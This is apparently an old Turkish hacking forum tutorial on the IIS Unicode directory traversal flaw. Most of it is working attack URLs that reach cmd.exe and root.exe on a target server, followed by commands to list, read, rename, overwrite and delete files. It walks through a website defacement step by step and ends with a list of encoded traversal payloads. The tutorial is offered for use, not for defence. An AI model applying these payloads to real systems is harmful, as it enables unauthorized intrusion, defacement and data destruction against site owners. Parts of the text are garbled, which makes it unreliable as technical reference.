Unicode Açığı

Unicode Açığı  Şimdi mantık şu Winnt sistemlerde bulunan cmd.exe root.exe sayesinde kendinizi o sistemin içine yollarsınız şimdi sisteme girmek için bazı dosyaları kullancaz Cmd.exe Root.exe  bunlar işte girmek için kullanıcaz www.target.com/c/winnt/system32/cmd.exe?c+dir  www.target.com/c/winnt/system32/root.exe?c+dir  www.target.com/c/winnt/system32/cmd1.exe?c+dir  gibi  bunlar ama root exe bazen burda olmuyor diğer yolu  www.target.com/c/ınetpub/scripts/root.exe?c+dir  Bunlar işte kısaca mesela echo kullanırken root.exe kullanın  Komutlar  Klasör oluşturur  www.target.com/c/winnt/system32/root.exe?c+mkdir+c:HackedbyX  İsmi değiştir  www.target.com/c/winnt/system32/root.exe?c+rename+c:index.html+hacked.html  İçeriğini gösterir  www.target.com/c/winnt/system32/root.exe?c+type+c:index.html  yazı yaz  www.target.com/c/winnt/system32/root.exe?c+echo+Hacked By GEnhack+>c:index.html  silmek  www.target.com/c/winnt/system32/root.exe?c+del+c:index.html  www.target.com/c/winnt/system32/root.exe?c+copy+c:index.htm+c:  Şimdi bir örnek :  ARkadaşlar şimdi diyelim sisteme girdiniz sonra  inetpub/wwwroot içine gidin ve indexi silin sonra herhangi bir htmlye ordaki hacked bilmemne felam yazın işte sonra rename yapın index.html yapın o dosyayı ve artık ) hacklendi Böyle yaparsanız İnternal SErver Error Vermez . ve burda verildiği gibi password dosyasını  kırma olyaının olmadığını gormus oluyorsunuz.unicode acıklarını bulmak için cgi scanner programını kullanabilirsiniz oldukça kullanışlı size unicode kodlarını verecem http://www.target.com/scripts/..À¯../winnt/system32/cmd.exe?/c+dir+c:/ http://www.target.com/_vti_bin/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir+c:/ http://www.target.com/_vti_bin/..À¯../winnt/system32/cmd.exe?/c+dir+c:/ http://www.target.com/winnt/system32/cmd.exe?/c+dir+c:/ http://www.target.com/scripts/Áœ/winnt/system32/cmd.exe?/c+dir+c:/ http://www.target.com/scripts/..À¯../winnt/system32/cmd.exe?/c+dir+c:/ http://www.target.com/msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+dir+c:/  cmd.exe ulaşmanız için verdim write